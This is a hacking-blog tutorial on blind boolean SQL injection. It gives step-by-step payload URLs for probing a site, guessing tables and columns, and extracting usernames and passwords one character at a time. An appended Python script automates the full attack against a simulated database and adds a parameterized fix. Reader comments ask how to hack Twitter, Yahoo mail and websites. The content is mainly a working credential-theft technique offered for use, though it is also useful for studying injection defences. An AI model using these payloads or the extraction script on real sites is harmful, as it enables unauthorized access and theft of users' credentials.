SQL Injection Part 3 - Blind Sql Injection

In my previous articles I showed how websites can be attacked with simple SQL injection and query-based SQL injection. Today I am going to explain blind SQL injection in detail. When a website is vulnerable to SQL injection but does not display any query output on its pages, we use blind SQL injection: instead of reading data off the page, we ask the database true/false questions and read the answer from whether the page loads normally or with its content missing. Blind injection is more complicated and time consuming, so you should already understand basic SQL injection; it is strongly recommended that you read my previous articles before proceeding.


Here is the vulnerable link.
http://vulnerablesite.com/product.php?id=12
When we visit the url we see a product article with a title and content.


Testing For Vulnerability
We test whether the injection point can be used for a blind attack by requesting the following link.
http://vulnerablesite.com/product.php?id=12 and 1=1
We should see the same page and content as before, because 1=1 is always true. Then try
http://vulnerablesite.com/product.php?id=12 and 1=2
If the injection works, the product content goes missing, because 1=2 is always false and the WHERE clause no longer matches the product row. That difference between the two responses is the only output channel we have from here on.

MySQL Version
http://vulnerablesite.com/product.php?id=12 and substring(@@version,1,1)=4
Here we take the first character of @@version and compare it to 4. If that is TRUE the page loads normally and the server is MySQL 4. If the content is missing, change the 4 to 5 and try again; this time the page loads normally with the content there, so we know we are dealing with MySQL 5. (MySQL coerces the one-character string to a number for the comparison, which is why =4 works without quotes.)



Checking For Table Names
http://vulnerablesite.com/product.php?id=12 and (SELECT 1 from admin limit 0,1)=1
Here I guessed the table name admin. If a table called admin exists, the subquery returns 1, the condition is true and the page loads normally. If the table does not exist the query fails with an error, which usually shows up as missing content (or an error page), so try another table name. Change the table name in the subquery to guess further tables. Note that the subquery returns nothing if the table exists but is empty, so an empty table looks the same as a missing one.



Checking For Column Names
If you are lucky and guessed some good table names, we can now try guessing columns within those tables.
http://vulnerablesite.com/product.php?id=12 and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1

concat(1,password) prepends the digit 1 to the column value, so its first character is always 1 and the condition is true whenever the column exists, whatever the password contains (as long as the first row's value is not NULL, since concat with NULL gives NULL). If the column does not exist, the query errors and the content goes missing, so try another column name. For the rest of this article assume we have found the table users with the columns userid, username and password, and we want to pull the data from them.



Pulling Data From Found Table/Columns
This is the part that takes the most time. Since no data is displayed on the page, we recover the value one character at a time by comparing each character's ASCII code against a number and watching whether the page loads.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100

The subquery selects the username and password of the user with userid=2, joined with a colon (0x3a is ':'). substring(...,1,1) takes the first character and ascii() turns it into its code. If that code is greater than 100 the page loads normally. In our case the content is missing, so we know the first character's code is 100 or less, and we guess again.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>80

The page loads normally with >80, so that is true. We go higher.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>90
False, so we go lower.

http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>86
False. Testing >85 in the same way returns true, so the code is greater than 85 but not greater than 86: it must be 86. You can confirm with =86 if you want to be sure; it may be confusing at first. In an ASCII table, char(86) is 'V', so the first letter of the returned row is 'V'. Splitting the remaining range in half at each step needs at most seven requests per character.


To get the next character we modify the substring.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>100

I changed substring(...,1,1) to substring(...,2,1), so it now returns the second character of the subselect, one character in length. We repeat the same process as for the first character. This time >100 returned true, so we raise the number.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>120
False, so we lower the number from 120.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>110
False, so we go lower.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>105
False, so we go lower.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>103
True, so we go higher.
http://vulnerablesite.com/product.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>104
True. The code is greater than 104 and not greater than 105, so it is 105, and char(105) is 'i'. We have 'Vi' so far. Keep incrementing the substring position and repeating the search until >0 returns false: past the end of the string substring() returns an empty string and ascii('') is 0, which tells us the value is complete.
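The whole procedure above (the 1=1/1=2 check, the table and column guesses, and the character-by-character dump with a binary search over the ASCII code) automated end to end, as an added example that is not part of the original article. It stands in an in-memory SQLite database for the site's MySQL backend, so the payloads use SQLite's unicode(), substr() and || where the article uses ascii(), substring() and concat(); SQLite has no @@version, so the version step is not modeled. The products/users tables, the userid=2 row and the credentials are constructed sample data, and vulnerable_page() is a hypothetical model of product.php, shown beside a parameterized version that the same payloads do not get through.

```python
import sqlite3

# Constructed sample data standing in for the vulnerable site's database
# (not real credentials). Names follow the article: products(id),
# users(userid, username, password).
SAMPLE_USERS = [
    (1, "Vince", "s3cret"),
    (2, "Victor", "hunter2"),
]


def make_db():
    """Build an in-memory SQLite database that plays the role of the backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products(id INTEGER PRIMARY KEY, title TEXT, content TEXT)")
    conn.execute("INSERT INTO products VALUES (12, 'Widget', 'Widget article body')")
    conn.execute("CREATE TABLE users(userid INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_page(conn, id_param):
    """Hypothetical model of product.php: the id parameter is pasted into the SQL.
    True when the product row comes back (page 'loads normally'); False when no
    row matches or the query errors (content missing). That bit is the oracle."""
    sql = "SELECT title, content FROM products WHERE id=" + id_param
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def hardened_page(conn, id_param):
    """The fix: the id is validated and bound as a parameter, so it is data, never SQL."""
    try:
        id_value = int(id_param)
    except ValueError:
        return False
    row = conn.execute("SELECT title, content FROM products WHERE id=?", (id_value,)).fetchone()
    return row is not None


class BlindOracle:
    """One ask() is one HTTP request in the article; requests are counted to show the cost."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        return vulnerable_page(self.conn, "12 and " + condition)


def is_injectable(oracle):
    """The article's 1=1 / 1=2 test: same page for true, missing content for false."""
    return oracle.ask("1=1") and not oracle.ask("1=2")


def table_exists(oracle, table):
    """Equivalent of `and (SELECT 1 from admin limit 0,1)=1`: an unknown table makes
    the query error, which the oracle reports as False (so does an empty table)."""
    return oracle.ask(f"(SELECT 1 FROM {table} LIMIT 1)=1")


def column_exists(oracle, table, column):
    """Equivalent of the concat(1,column) trick. SQLite does not coerce '1' to 1 in
    comparisons the way MySQL does, so we compare against the string '1'."""
    return oracle.ask(f"(SELECT substr('1' || {column}, 1, 1) FROM {table} LIMIT 1)='1'")


# The subselect being dumped; the MySQL spelling is concat(username,0x3a,password).
SUBSELECT = "(SELECT username || ':' || password FROM users WHERE userid=2)"


def extract_char(oracle, pos, lo=0, hi=127):
    """Binary-search the ASCII code of character `pos` (1-based) of SUBSELECT.
    Each probe is the article's `ascii(substring(...,pos,1))>N`. Past the end of
    the string substr() yields '' and unicode('') is NULL, so every probe is false
    and 0 comes back, matching the article's end-of-string rule (>0 false)."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(f"unicode(substr({SUBSELECT}, {pos}, 1))>{mid}"):
            lo = mid + 1  # code is above mid
        else:
            hi = mid      # code is mid or below
    return lo


def extract_string(oracle, max_len=64):
    """Dump SUBSELECT one character at a time, as the article does by hand."""
    chars = []
    for pos in range(1, max_len + 1):
        code = extract_char(oracle, pos)
        if code == 0:
            break
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    conn = make_db()
    oracle = BlindOracle(conn)
    print("injectable:", is_injectable(oracle))
    print("table users exists:", table_exists(oracle, "users"))
    print("table admin exists:", table_exists(oracle, "admin"))
    print("column users.password exists:", column_exists(oracle, "users", "password"))
    dumped = extract_string(oracle)
    print("dumped:", dumped, "using", oracle.requests, "requests so far")
    print("hardened page with payload:", hardened_page(conn, "12 and 1=1"))
```

Each character costs seven requests with this search (128 candidate codes, halved each time), so the 14-character value plus the end-of-string check takes 105 requests; against a real target that request volume, all on one URL with `and unicode(...)` or `and ascii(...)` in the query string, is exactly what a WAF or access-log review should catch. The parameterized hardened_page() returns the product for id=12 and nothing for any of the payloads, because the value never reaches the parser as SQL.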

An ASCII code chart is given below for better understanding.

Or you can find the same chart online at the following link.

Hope you liked this article, feel free to leave your comments for further doubts and clarifications.

About the Guest Author:
This article is written by Mr Srinivas, who owns Hackinginception, where he writes articles related to hacking. If you're interested in writing a guest post at Hackaholic, please contact me.


Ra one

Excellent one! I was searching for this for a long time. Thank you John and Srinivas :)

Anonymous

Hello. This is a good tutorial, but I was thinking that anyone could tell me how to hack a Twitter account that is not active, with an unchecked email and not used anymore, because I need to recover it. Please, anyone, help!!

piit

Can this method be used for Yahoo mail?

Anonymous

I wanted to hack a website through SQL injection. Your articles are based on PHP, but it's not working with sit? =something, so please help me.



© 101hacker | Design by Mukund edited by John